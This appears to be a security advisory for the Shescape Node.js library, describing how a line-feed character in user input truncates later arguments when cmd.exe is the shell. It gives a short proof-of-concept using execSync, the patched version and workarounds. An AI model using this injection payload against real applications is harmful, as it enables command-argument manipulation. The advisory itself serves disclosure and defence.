This impacts users that use Shescape (any API function) to escape arguments for cmd.exe on Windows. An attacker can omit all arguments following their input by including a line feed character ('\n'
) in the payload. Example:
import cp from "node:child_process";
import * as shescape from "shescape";
// 1. Prerequisites
const options = {
shell: "cmd.exe",
};
// 2. Attack
const payload = "attacker\n";
// 3. Usage
let escapedPayload;
escapedPayload = shescape.escape(payload, options);
// Or
escapedPayload = shescape.escapeAll([payload], options)[0];
// Or
escapedPayload = shescape.quote(payload, options);
// Or
escapedPayload = shescape.quoteAll([payload], options)[0];
cp.execSync(`echo Hello ${escapedPayload}! How are you doing?`, options);
// Outputs: "Hello attacker"
Note:
execSync
is just illustrative here, all ofexec
,execFile
,execFileSync
,fork
,spawn
, andspawnSync
can be attacked using a line feed character if CMD is the shell being used.
This bug has been patched in [v1.5.8] which you can upgrade to now. No further changes are required.
Alternatively, line feed characters ('\n'
) can be stripped out manually or the user input can be made the last argument (this only limits the impact).
If you have any questions or comments about this advisory:
{ "nvd_published_at": "2022-08-01T20:15:00Z", "severity": "HIGH", "github_reviewed_at": "2022-07-15T21:39:14Z", "github_reviewed": true, "cwe_ids": [ "CWE-74" ] }